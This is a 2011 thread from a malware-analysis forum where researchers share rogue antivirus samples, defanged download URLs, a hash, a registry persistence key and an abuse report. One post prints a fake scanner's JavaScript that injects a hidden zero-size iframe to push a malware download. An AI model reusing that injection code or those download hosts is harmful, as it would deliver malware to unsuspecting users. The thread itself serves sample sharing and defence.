Re: Rogue antimalware (FakeAV, FakeAlert)
PostPosted:Thu Sep 08, 2011 7:19 pm
Tracking Cyber Crime: Golden Ducat (AV Affil)
Security Shield sample in attach.
Security Shield sample in attach.
KernelMode.info
A forum for reverse engineering, OS internals and malware analysis
https://www.kernelmode.info/forum/
Rogue Antimalware (FakeAV, 2011 year)
Page 23 of 34
System Recovery
PostPosted:Mon Sep 12, 2011 2:07 pm
System Recovery
Re: Rogue antimalware (FakeAV, FakeAlert)
PostPosted:Mon Sep 12, 2011 2:22 pm
security shield fake scanner
Code: Select all
function who conduct to redirect page for malware download, with hidden message 'fuck nod32'
hXXp://oorvyvwdeciphers.info/fast-scan/function black(){
var f = '<iframe ';
var u = 'src="black.php" ';
var c = 'style="';
var k = 'width: 0px; ';
var n = 'height: 0px; ';
var o = 'border: 0px;';
var d32 = '"></iframe>';
document.getElementById('frame').innerHTML = f+u+c+k+n+o+d32;
}
Windows Live Protect
PostPosted:Tue Sep 13, 2011 12:24 pm
Windows Live Protect
(korean rogue)
http://www.virustotal.com/file-scan/rep ... 1315881296
MD5 : 4385fa9dd04fdff8c9e25a1e296fb456
(korean rogue)
http://www.virustotal.com/file-scan/rep ... 1315881296
MD5 : 4385fa9dd04fdff8c9e25a1e296fb456
Data Recovery
PostPosted:Wed Sep 14, 2011 9:06 am
Data Recovery
Re: Rogue antimalware (FakeAV, FakeAlert)
PostPosted:Fri Sep 16, 2011 7:29 am
Code: Select all
Fake scan page, with Koobface as payload.hXXp://www.lamatita.info/eee/scan/http://www.virustotal.com/file-scan/rep ... 1316157525
in attach the fake scanner page without koobface
Re: Rogue antimalware (FakeAV, FakeAlert)
PostPosted:Mon Sep 19, 2011 6:23 pm
Hi All,
Fresh bunch of Fake AVs.
Web links -
hxxp://dw.wideon.co.kr/Setup/binc/WindowSystem_se.exe
hxxp://dw.wideon.co.kr/Setup/binc/WindowSystem_updater.exe
hxxp://dw.wideon.co.kr/WideOnSetup.exe
hxxp://dw.wideon.co.kr/Setup/binc/WindowSystem_uninstaller.exe
hxxp://soul-you.in/aslpatch10.exe
hxxp://down.vaccinescan.co.kr/app/partner_2010/vaccinescan_ancamera.exe
hxxp://update.speedboan.co.kr/bin/speedboan.exe
hxxp://update.speedboan.co.kr/bin/speedboanU.exe
Files :
WindowSystem_se.exe, WindowSystem_updater.exe, WideOnSetup.exe, WindowSystem_uninstaller.exe ===> 19-09-2011-FakeAVs-part01.7z
vaccinescan_ancamera.exe, speedboan.exe, speedboanU.exe ===> 19-09-2011-FakeAVs-part02.7z
aslpatch10.exe ===>19-09-2011-FakeAVs-part03.7z
Regards,
rough_spear. ;)
Fresh bunch of Fake AVs.
Web links -
hxxp://dw.wideon.co.kr/Setup/binc/WindowSystem_se.exe
hxxp://dw.wideon.co.kr/Setup/binc/WindowSystem_updater.exe
hxxp://dw.wideon.co.kr/WideOnSetup.exe
hxxp://dw.wideon.co.kr/Setup/binc/WindowSystem_uninstaller.exe
hxxp://soul-you.in/aslpatch10.exe
hxxp://down.vaccinescan.co.kr/app/partner_2010/vaccinescan_ancamera.exe
hxxp://update.speedboan.co.kr/bin/speedboan.exe
hxxp://update.speedboan.co.kr/bin/speedboanU.exe
Files :
WindowSystem_se.exe, WindowSystem_updater.exe, WideOnSetup.exe, WindowSystem_uninstaller.exe ===> 19-09-2011-FakeAVs-part01.7z
vaccinescan_ancamera.exe, speedboan.exe, speedboanU.exe ===> 19-09-2011-FakeAVs-part02.7z
aslpatch10.exe ===>19-09-2011-FakeAVs-part03.7z
Regards,
rough_spear. ;)
Re: Rogue antimalware (FakeAV, FakeAlert)
PostPosted:Wed Sep 21, 2011 4:36 pm
Hi, ;)
One more Fake AV.
File name - ana.exe
size - 2.07 MB
Weblink :
hxxp://bluemig.de/ana.exe
Regards,
rough_spear. :D
One more Fake AV.
File name - ana.exe
size - 2.07 MB
Weblink :
hxxp://bluemig.de/ana.exe
Regards,
rough_spear. :D
Re: Rogue antimalware (FakeAV, FakeAlert)
PostPosted:Wed Sep 21, 2011 4:51 pm
rough_spear wrote:Hi, ;)This is Total Protect FakeAV written on dot net.
One more Fake AV.
It is aggressive - terminating starting application with fake virus warning alerts - usual behavior for this type of FakeAV.
Runs from X:\Documents and Settings\UserName\Application Data\
via
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Re: Rogue antimalware (FakeAV, FakeAlert)
PostPosted:Wed Sep 21, 2011 4:57 pm
i wrote abuse to strato (hoster) they are sending answer normaly in 24 hours.